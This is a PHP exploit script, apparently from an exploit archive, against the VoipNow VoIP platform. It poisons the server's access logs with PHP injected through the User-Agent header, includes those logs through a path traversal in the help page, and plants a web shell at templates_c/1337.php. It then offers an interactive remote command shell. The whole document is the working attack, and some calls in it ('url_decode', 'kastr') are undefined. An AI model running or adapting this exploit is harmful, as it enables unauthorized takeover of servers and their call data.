VoipNow , Remote command execution Exploit

1. <?
2. /*
3. + Application : Voipnow
4. | Download : http://4psa.com/
5. | By Faris , AKA i-Hmx
6. | [email protected]
7. + sec4ever.com , 1337s.cc
8. */
9. echo "\n+-------------------------------------------+\n";
10. echo "|                  VoipNow                  |\n";
11. echo "|         PHP Code Injection Exploit        |\n";
12. echo "|                  By i-Hmx                 |\n";
13. echo "|                sec4ever.com               |\n";
14. echo "|             [email protected]             |\n";
15. echo "+-------------------------------------------+\n";
16. echo "\n| Enter Target [Ip Only] # ";
17. $target=trim(fgets(STDIN));
18. echo "[+] Attacking $target\n";
19. function faget($url,$post,$uagent){
20. $curl=curl_init();
21. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
22. curl_setopt($curl,CURLOPT_URL,$url);
23. curl_setopt($curl, CURLOPT_USERAGENT, $uagent);
24. curl_setopt($curl, CURLOPT_REFERER, "http://1337s.cc/index.php");
25. curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
26. curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
27. curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
28. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
29. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
30. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
31. curl_setopt($curl,CURLOPT_TIMEOUT,20);
32. curl_setopt($curl, CURLOPT_HEADER, true);
33. $exec=curl_exec($curl);
34. curl_close($curl);
35. return $exec;
36. }
37. $inj="<?php eval(url_decode('%24f%3Dfopen%28%27%2fusr%2flocal%2fvoipnow%2fadmin%2fhtdocs%2ftemplates_c%2f1337.php%27%2C%27w%2b%27%29%3B%24data%3D%27%3C%3F%20echo%20%22Faris%20on%20the%20mic%20%3AD%3Cbr%3E%3Cb%[email protected]%3C%2fb%3E%3Cbr%3E-----------------%22%3B@eval%28base64_decode%28%24_POST%5Bfa%5D%29%29%3Becho%20%22-----------------%22%3B%20%3F%3E%27%3Bfwrite%28%24f%2C%24data%29%3Becho%20%22done%22%3B')); ?>";
38. echo " | Injecting Payload(s) [ Time Depend on server traffic ]\n";
39. echo "     + [0]";
40. faget("https://".$target."/help/index.php?screen=../../../../../../../../usr/local/voipnow/admin/logs/access.log",'',$inj);
41. echo " > Done\n";
42. for($f=1;$f<4;$f++)
43. {
44. echo "     + [$f]";
45. faget("https://".$target."/help/index.php?screen=../../../../../../../../usr/local/voipnow/admin/logs/access.log.$f",'',$inj);
46. echo " > Done\n";
47. }
48. echo " | Testing Payload Execution\n";
49. $fa1=faget("https://".$target."/templates_c/1337.php",'',"Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
50. if(!eregi("Faris on the mic :D",$fa1))
51. {
52. die("[+] Exploitation Failed :(\n");
53. }
54. echo " | Sending CMD test package\n";
55. $cmd=faget($target."/templates_c/1337.php","fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
56. if(!eregi("farsawy",$cmd))
57. {
58. die("   + Cmd couldn't executed but we can evaluate php code\n   + use : $target/templates_c/1337.php\n   Post : fa=base64code\n");
59. }
60. echo "| sec4ever shell online ;)\n\n";
61. while(1){
62. echo "i-Hmx@$host# ";
63. $c=trim(fgets(STDIN));
64. if($c=='exit'){die("[+] Terminating\n");}
65. $payload=base64_encode("passthru('$c');");
66. $fuck=faget("https://".$target."/templates_c/1337.php","fa=$payload","Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
67. $done=kastr($fuck,"-----------------","-----------------");
68. echo "$done\n";
69. }
70. ?>